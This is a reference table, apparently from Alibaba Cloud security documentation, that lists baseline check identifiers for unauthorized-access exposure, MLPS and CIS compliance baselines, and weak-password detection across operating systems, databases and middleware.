hc_exploit_hadoop | Important threat exploit: Unauthorized access to Hadoop | |
hc_exploit_jboss | Important threat exploit: Unauthorized access to JBoss | |
hc_exploit_jenkins | Important threat exploit: Unauthorized access to Jenkins | |
hc_exploit_k8s_api | Important threat exploit: Unauthorized access to Kubernetes API server | |
hc_exploit_ldap | Important threat exploit: Unauthorized access to LDAP (Windows environment) | |
hc_exploit_ldap_linux | Important threat exploit: Unauthorized access to OpenLDAP (Linux environment) | |
hc_exploit_memcache | Important threat exploit: Unauthorized access to Memcached | |
hc_exploit_mongo | Important threat exploit: Unauthorized access to MongoDB | |
hc_exploit_pgsql | Important threat exploit: Unauthorized access to PostgreSQL | |
hc_exploit_rabbitmq | Important threat exploit: Unauthorized access to RabbitMQ | |
hc_exploit_rsync | Important threat exploit: Unauthorized access to rsync | |
hc_exploit_tomcat | Important threat exploit: Apache Tomcat AJP file inclusion vulnerability | |
hc_exploit_zookeeper | Important threat exploit: Unauthorized access to ZooKeeper | |
hc_container | hc_docker | Alibaba Cloud standard: Docker security baseline check |
hc_middleware_ack_master | International security best practices: Kubernetes (ACK) master node security baseline check | |
hc_middleware_ack_node | International security best practices: Kubernetes (ACK) node security baseline check | |
hc_middleware_k8s | Alibaba Cloud standard: Kubernetes master node security baseline check | |
hc_middleware_k8s_node | Alibaba Cloud standard: Kubernetes node security baseline check | |
cis | hc_suse 15_djbh | MLPS 2.0 Level 3: SUSE 15 compliance baseline check |
hc_aliyun_linux3_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux 3 compliance baseline check | |
hc_aliyun_linux_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check | |
hc_bind_djbh | MLPS 2.0 Level 3: Bind compliance baseline check | |
hc_centos 6_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 6 compliance baseline check | |
hc_centos 7_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 7 compliance baseline check | |
hc_centos 8_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 8 compliance baseline check | |
hc_debian_djbh_l3 | MLPS 2.0 Level 3: Debian Linux 8/9/10 compliance baseline check | |
hc_iis_djbh | MLPS 2.0 Level 3: IIS compliance baseline check | |
hc_informix_djbh | MLPS 2.0 Level 3: Informix compliance baseline check | |
hc_jboss_djbh | MLPS 2.0 Level 3: JBoss compliance baseline check | |
hc_mongo_djbh | MLPS 2.0 Level 3: MongoDB compliance baseline check | |
hc_mssql_djbh | MLPS Level 3: SQL Server compliance baseline check | |
hc_mysql_djbh | MLPS 2.0 Level 3: MySQL compliance baseline check | |
hc_nginx_djbh | MLPS 2.0 Level 3: Nginx compliance baseline check | |
hc_oracle_djbh | MLPS Level 3: Oracle Compliance Baseline Check | |
hc_pgsql_djbh | MLPS 2.0 Level 3: PostgreSQL compliance baseline check | |
hc_redhat 6_djbh_l3 | MLPS 2.0 Level 3: Red Hat Linux 6 compliance baseline check | |
hc_redhat_djbh_l3 | MLPS Level 3 - Red Hat Linux 7 compliance baseline check | |
hc_redis_djbh | MLPS 2.0 Level 3: Redis compliance baseline check | |
hc_suse 10_djbh_l3 | MLPS 2.0 Level 3: SUSE 10 compliance baseline check | |
hc_suse 12_djbh_l3 | MLPS 2.0 Level 3: SUSE 12 compliance baseline check | |
hc_suse_djbh_l3 | MLPS 2.0 Level 3: SUSE 11 compliance baseline check | |
hc_ubuntu 14_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 14 compliance baseline check | |
hc_ubuntu_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 16/18/20 compliance baseline check | |
hc_was_djbh | MLPS 2.0 Level 3: Websphere Application Server compliance baseline check | |
hc_weblogic_djbh | MLPS Level 3 - WebLogic Compliance Baseline Check | |
hc_win 2008_djbh_l3 | MLPS 2.0 Level 3: Windows 2008 R2 compliance baseline check | |
hc_win 2012_djbh_l3 | MLPS 2.0 Level 3: Windows 2012 R2 compliance baseline check | |
hc_win 2016_djbh_l3 | MLPS 2.0 Level 3: Windows 2016/2019 compliance baseline check | |
hc_aliyun_linux_djbh_l2 | MLPS 2.0 Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check | |
hc_centos 6_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 6 compliance baseline check | |
hc_centos 7_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 7 compliance baseline check | |
hc_debian_djbh_l2 | MLPS 2.0 Level 2: Debian Linux 8 compliance baseline check | |
hc_redhat 7_djbh_l2 | MLPS 2.0 Level 2: Red Hat Linux 7 compliance baseline check | |
hc_ubuntu_djbh_l2 | MLPS 2.0 Level 2: Ubuntu 16/18 compliance baseline check | |
hc_win 2008_djbh_l2 | MLPS 2.0 Level 2: Windows 2008 R2 compliance baseline check | |
hc_win 2012_djbh_l2 | MLPS 2.0 Level 2: Windows 2012 R2 compliance baseline check | |
hc_win 2016_djbh_l2 | MLPS 2.0 Level 2: Windows 2016/2019 compliance baseline check | |
hc_aliyun_linux_cis | International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check | |
hc_centos 6_cis_rules | International security best practices: CentOS Linux 6 security baseline check | |
hc_centos 7_cis_rules | International security best practices: CentOS Linux 7 security baseline check | |
hc_centos 8_cis_rules | International security best practices: CentOS Linux 8 security baseline check | |
hc_debian 8_cis_rules | International security best practices: Debian Linux 8 security baseline check | |
hc_ubuntu 14_cis_rules | International security best practices: Ubuntu 14 security baseline check | |
hc_ubuntu 16_cis_rules | International security best practices: Ubuntu 16/18/20 security baseline check | |
hc_win 2008_cis_rules | International security best practices: Windows Server 2008 R2 security baseline check | |
hc_win 2012_cis_rules | International security best practices: Windows Server 2012 R2 security baseline check | |
hc_win 2016_cis_rules | International security best practices: Windows Server 2016/2019 R2 security baseline check | |
hc_kylin_djbh_l3 | MLPS 2.0 Level 3: Kylin compliance baseline check | |
hc_uos_djbh_l3 | MLPS 2.0 Level 3: UOS compliance baseline check | |
hc_best_security | hc_aliyun_linux | Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
hc_centos 6 | Alibaba Cloud standard: CentOS Linux 6 security baseline check | |
hc_centos 7 | Alibaba Cloud standard: CentOS Linux 7/8 security baseline check | |
hc_debian | Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check | |
hc_redhat 6 | Alibaba Cloud standard: Red Hat Linux 6 security baseline check | |
hc_redhat 7 | Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check | |
hc_ubuntu | Alibaba Cloud standard: Ubuntu security baseline check | |
hc_windows_2008 | Alibaba Cloud standard: Windows 2008 R2 security baseline check | |
hc_windows_2012 | Alibaba Cloud standard: Windows 2012 R2 security baseline check | |
hc_windows_2016 | Alibaba Cloud standard: Windows 2016/2019 security baseline check | |
hc_db_mssql | Alibaba Cloud standard: SQL Server security baseline check | |
hc_memcached_ali | Alibaba Cloud standard: Memcached security baseline check | |
hc_mongodb | Alibaba Cloud standard: MongoDB 3.x security baseline check | |
hc_mysql_ali | Alibaba Cloud standard: MySQL security baseline check | |
hc_oracle | Alibaba Cloud standard: Oracle 11g security baseline check | |
hc_pgsql_ali | Alibaba Cloud standard: PostgreSQL security baseline check | |
hc_redis_ali | Alibaba Cloud standard: Redis security baseline check | |
hc_apache | Alibaba Cloud standard: Apache security baseline check | |
hc_iis_8 | Alibaba Cloud standard: IIS 8 security baseline check | |
hc_nginx_linux | Alibaba Cloud standard: Nginx security baseline check | |
hc_suse 15 | Alibaba Cloud standard: SUSE Linux 15 security baseline check | |
tomcat 7 | Alibaba Cloud standard: Apache Tomcat security baseline check | |
weak_password | hc_mongodb_pwd | Weak password: MongoDB logon weak password detection (supports version 2.x) |
hc_weakpwd_ftp_linux | Weak password: FTP logon weak password check | |
hc_weakpwd_linux_sys | Weak password: Linux system logon weak password check | |
hc_weakpwd_mongodb 3 | Weak password: MongoDB logon weak password detection | |
hc_weakpwd_mssql | Weak password: SQL Server database logon weak password check | |
hc_weakpwd_mysql_linux | Weak password: MySQL database logon weak password check | |
hc_weakpwd_mysql_win | Weak password: MySQL database logon weak password check (Windows) | |
hc_weakpwd_openldap | Weak password: OpenLDAP logon weak password check | |
hc_weakpwd_oracle | Weak password: Oracle logon weak password detection | |
hc_weakpwd_pgsql | Weak password: PostgreSQL database logon weak password check | |
hc_weakpwd_pptp | Weak password: pptpd service logon weak password check | |
hc_weakpwd_redis_linux | Weak password: Redis database logon weak password check | |
hc_weakpwd_rsync | Weak password: rsync service logon weak password check | |
hc_weakpwd_svn | Weak password: SVN service logon weak password check | |
hc_weakpwd_tomcat_linux | Weak password: Apache Tomcat console weak password check | |
hc_weakpwd_vnc | Weak password: VNC Server weak password check | |
hc_weakpwd_weblogic | Weak password: WebLogic 12c logon weak password detection | |
hc_weakpwd_win_sys | Weak password: Windows system logon weak password check |